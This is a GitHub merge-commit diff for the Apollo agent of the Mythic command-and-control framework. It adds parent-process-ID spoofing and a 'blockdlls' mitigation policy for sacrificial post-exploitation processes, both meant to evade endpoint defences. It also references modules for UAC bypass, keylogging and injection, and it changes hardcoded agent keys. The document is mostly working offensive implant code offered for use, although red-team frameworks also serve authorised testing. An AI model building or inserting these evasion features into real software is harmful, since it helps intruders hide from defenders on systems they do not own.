Merge pull request #52 from MythicAgents/dev

ppid, blockdlls, bug fixes, and documentation
MythicAgents · Aug 25, 2021 · 92958fc · 92958fc
2 parents db251ef + 9de51db
commit 92958fc
Show file tree

Hide file tree

Showing 23 changed files with 610 additions and 48 deletions.
diff --git a/Payload_Type/apollo/agent_code/Apollo/Apollo.cs b/Payload_Type/apollo/agent_code/Apollo/Apollo.cs
@@ -22,7 +22,7 @@ class Apollo
     {
 
 #if DEBUG
-        public static string AgentUUID = "b4609e96-7994-42bd-9c5b-32b0782fc613";
+        public static string AgentUUID = "8efc9695-46a7-4f55-ae38-892ec43f3c87";
 #endif
 
         [STAThread]
@@ -38,7 +38,7 @@ static void Main(string[] args)
             }
             else
             {
-                profile = new DefaultProfile(AgentUUID, "ohlhmQqP1u0pwke9JHDHzheYooqRPbNTDJjZIdQawi8=");
+                profile = new DefaultProfile(AgentUUID, "48OJw9IWxquvk58QhHOPV0j562sqMVPKvMMya/dsdng=");
             }
 #else
             DefaultProfile profile = new DefaultProfile();

diff --git a/Payload_Type/apollo/agent_code/Apollo/Apollo.csproj b/Payload_Type/apollo/agent_code/Apollo/Apollo.csproj
@@ -121,6 +121,7 @@
     <Reference Include="System.Xml" />
   </ItemGroup>
   <ItemGroup>
+    <Compile Include="CommandModules\BlockDlls.cs" />
     <Compile Include="CommandModules\BypassUac.cs" />
     <Compile Include="CommandModules\Inject.cs" />
     <Compile Include="CommandModules\Keylog.cs" />
@@ -131,6 +132,7 @@
     <Compile Include="CommandModules\NetLocalGroup.cs" />
     <Compile Include="CommandModules\NetLocalGroupMember.cs" />
     <Compile Include="CommandModules\NetShares.cs" />
+    <Compile Include="CommandModules\Ppid.cs" />
     <Compile Include="CommandModules\PrintSpoofer.cs" />
     <Compile Include="CommandModules\RegistryManager.cs" />
     <Compile Include="CommandModules\Socks.cs" />

diff --git a/Payload_Type/apollo/agent_code/Apollo/CommandModules/BlockDlls.cs b/Payload_Type/apollo/agent_code/Apollo/CommandModules/BlockDlls.cs
@@ -0,0 +1,58 @@
+#define COMMAND_NAME_UPPER
+
+#if DEBUG
+#undef BLOCKDLLS
+#define BLOCKDLLS
+#endif
+
+#if BLOCKDLLS
+using System;
+using System.Linq;
+using System.Text;
+using Apollo.Jobs;
+using Apollo.Tasks;
+using Apollo.Evasion;
+using Newtonsoft.Json;
+
+namespace Apollo.CommandModules
+{
+    class BlockDlls
+    {
+
+        public struct BlockDllArgs
+        {
+            public bool block;
+        }
+
+        /// <summary>
+        /// Change the sacrificial process that's spawned for certain post-exploitation jobs
+        /// such as execute assembly. Valid taskings are spawnto_x64 and spawnto_x86. If the
+        /// file does not exist or the file is not of an executable file type, the job
+        /// will return an error message.
+        /// </summary>
+        /// <param name="job">Job associated with this task. The filepath is specified by job.Task.parameters.</param>
+        /// <param name="agent">Agent this task is run on.</param>
+        /// 
+        public static void Execute(Job job, Agent agent)
+        {
+            Task task = job.Task;
+            BlockDllArgs args = JsonConvert.DeserializeObject<BlockDllArgs>(job.Task.parameters);
+
+            if (EvasionManager.BlockDlls(args.block))
+            {
+                if (args.block)
+                {
+                    job.SetComplete($"Blocking non-Microsoft-signed DLLs.");
+                } else
+                {
+                    job.SetComplete("All DLLs can be loaded into post-ex processes.");
+                }
+            }
+            else
+            {
+                job.SetError($"Failed to set block DLLs.");
+            }
+        }
+    }
+}
+#endif
diff --git a/Payload_Type/apollo/agent_code/Apollo/CommandModules/PowerShellManager.cs b/Payload_Type/apollo/agent_code/Apollo/CommandModules/PowerShellManager.cs
@@ -340,6 +340,7 @@ public static void ExecutePowerPick(AJ.Job job, Agent agent)
                 if (!sacrificialProcess.HasExited)
                 {
                     sacrificialProcess.Kill();
+                    job.SetComplete("");
                 }
             }
         }

diff --git a/Payload_Type/apollo/agent_code/Apollo/CommandModules/Ppid.cs b/Payload_Type/apollo/agent_code/Apollo/CommandModules/Ppid.cs
@@ -0,0 +1,52 @@
+#define COMMAND_NAME_UPPER
+
+#if DEBUG
+#undef PPID
+#define PPID
+#endif
+
+#if PPID
+using System;
+using System.Linq;
+using System.Text;
+using Apollo.Jobs;
+using Apollo.Tasks;
+using Apollo.Evasion;
+using Newtonsoft.Json;
+
+namespace Apollo.CommandModules
+{
+    class Ppid
+    {
+
+        public struct PpidArgs
+        {
+            public int ppid;
+        }
+
+        /// <summary>
+        /// Change the sacrificial process that's spawned for certain post-exploitation jobs
+        /// such as execute assembly. Valid taskings are spawnto_x64 and spawnto_x86. If the
+        /// file does not exist or the file is not of an executable file type, the job
+        /// will return an error message.
+        /// </summary>
+        /// <param name="job">Job associated with this task. The filepath is specified by job.Task.parameters.</param>
+        /// <param name="agent">Agent this task is run on.</param>
+        /// 
+        public static void Execute(Job job, Agent agent)
+        {
+            Task task = job.Task;
+            PpidArgs args = JsonConvert.DeserializeObject<PpidArgs>(job.Task.parameters);
+
+            int pid = args.ppid;
+            if (EvasionManager.SetParentProcessId(pid))
+            {
+                job.SetComplete($"Set parent process ID of post-ex jobs to {pid}");
+            } else
+            {
+                job.SetError($"Failed to set parent process ID to {pid}. Ensure process with ID {pid} is running.");
+            }
+        }
+    }
+}
+#endif
diff --git a/Payload_Type/apollo/agent_code/Apollo/Evasion/EvasionManager.cs b/Payload_Type/apollo/agent_code/Apollo/Evasion/EvasionManager.cs
@@ -3,8 +3,12 @@
 #if DEBUG
 #undef SPAWNTO_x86
 #undef SPAWNTO_X64
+#undef PPID
+#undef BLOCKDLLS
+#define BLOCKDLLS
 #define SPAWNTO_X86
 #define SPAWNTO_X64
+#define PPID
 #endif
 
 using Apollo.CommandModules;
@@ -19,30 +23,36 @@ namespace Apollo.Evasion
 {
     internal static class EvasionManager
     {
-        private static string SpawnTo64 = "C:\\Windows\\System32\\rundll32.exe";
-        private static string SpawnTo64Args = "";
-        private static string SpawnTo86 = "C:\\Windows\\SysWOW64\\rundll32.exe";
-        private static string SpawnTo86Args = "";
+        private static string _spawnTo64 = "C:\\Windows\\System32\\rundll32.exe";
+        private static string _spawnTo64Args = "";
+        private static string _spawnTo86 = "C:\\Windows\\SysWOW64\\rundll32.exe";
+        private static string _spawnTo86Args = "";
+        private static int _parentProcessId = System.Diagnostics.Process.GetCurrentProcess().Id;
+        private static bool _blockDLLs = false;
 
         internal struct SacrificialProcessStartupInformation
         {
             internal string Application;
             internal string Arguments;
+            internal int ParentProcessId;
+            internal bool BlockDlls;
         }
 
         internal static SacrificialProcessStartupInformation GetSacrificialProcessStartupInformation()
         {
             SacrificialProcessStartupInformation results = new SacrificialProcessStartupInformation();
             if (IntPtr.Size == 8)
             {
-                results.Application = SpawnTo64;
-                results.Arguments = SpawnTo64Args;
+                results.Application = _spawnTo64;
+                results.Arguments = _spawnTo64Args;
             }
             else
             {
-                results.Application = SpawnTo86;
-                results.Arguments = SpawnTo86;
+                results.Application = _spawnTo86;
+                results.Arguments = _spawnTo86;
             }
+            results.ParentProcessId = _parentProcessId;
+            results.BlockDlls = _blockDLLs;
             return results;
         }
 
@@ -52,9 +62,9 @@ internal static bool SetSpawnTo64(string fileName, string args = "")
             bool bRet = false;
             if (FileUtils.IsExecutable(fileName))
             {
-                SpawnTo64 = fileName;
+                _spawnTo64 = fileName;
                 if (!string.IsNullOrEmpty(args))
-                    SpawnTo64Args = args;
+                    _spawnTo64Args = args;
                 bRet = true;
             }
             return bRet;
@@ -66,13 +76,33 @@ internal static bool SetSpawnTo86(string fileName, string args = "")
             bool bRet = false;
             if (FileUtils.IsExecutable(fileName))
             {
-                SpawnTo86 = fileName;
+                _spawnTo86 = fileName;
                 if (!string.IsNullOrEmpty(args))
-                    SpawnTo86Args = args;
+                    _spawnTo86Args = args;
                 bRet = true;
             }
             return bRet;
         }
+#endif
+#if PPID
+        internal static bool SetParentProcessId(int processId)
+        {
+            bool bRet = false;
+            try
+            {
+                System.Diagnostics.Process.GetProcessById(processId);
+                bRet = true;
+                _parentProcessId = processId;
+            } catch { }
+            return bRet;
+        }
+#endif
+#if BLOCKDLLS
+        internal static bool BlockDlls(bool status)
+        {
+            _blockDLLs = status;
+            return true;
+        }
 #endif
     }
 }
diff --git a/Payload_Type/apollo/agent_code/Apollo/Native/Constants.cs b/Payload_Type/apollo/agent_code/Apollo/Native/Constants.cs
@@ -7,7 +7,7 @@ namespace Native
     internal static class Constants
     {
         #region CONSTANTS
-
+        public const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000;
         public const int HANDLE_FLAG_INHERIT = 1;
         public static uint STARTF_USESTDHANDLES = 0x00000100;
         public const UInt32 INFINITE = 0xFFFFFFFF;
@@ -44,7 +44,8 @@ internal static class Constants
         public const uint SECURITY_MANDATORY_HIGH_RID = 0x00003000;
         public const uint SECURITY_MANDATORY_SYSTEM_RID = 0x00004000;
 
-
+        public const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007;
+        public const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;
         #endregion
 
     }

diff --git a/Payload_Type/apollo/agent_code/Apollo/Native/Enums.cs b/Payload_Type/apollo/agent_code/Apollo/Native/Enums.cs
@@ -25,6 +25,13 @@ public enum LogonProvider
             LOGON32_PROVIDER_WINNT50
         }
 
+        [Flags]
+        public enum DuplicateOptions : uint
+        {
+            DuplicateCloseSource = 0x00000001,
+            DuplicateSameAccess = 0x00000002
+        }
+
         [Flags]
         public enum CreateProcessFlags
         {
@@ -88,7 +95,8 @@ internal enum ProcessAccessFlags : UInt32
             PROCESS_VM_READ = 0x0010,
             PROCESS_VM_WRITE = 0x0020,
             SYNCHRONIZE = 0x00100000,
-            PROCESS_ALL_ACCESS = 0x000F0000 | 0x00100000 | 0xFFFF
+            PROCESS_ALL_ACCESS = 0x000F0000 | 0x00100000 | 0xFFFF,
+            MAXIMUM_ALLOWED = 0x02000000
         }
 
         public enum NET_API_STATUS : int
-Original file line number
+Diff line change
@@ Expand Up @@
                     if (!sacrificialProcess.HasExited)
                     {
                         sacrificialProcess.Kill();
+                        job.SetComplete("");
                     }
                 }
             }
@@ Expand Down @@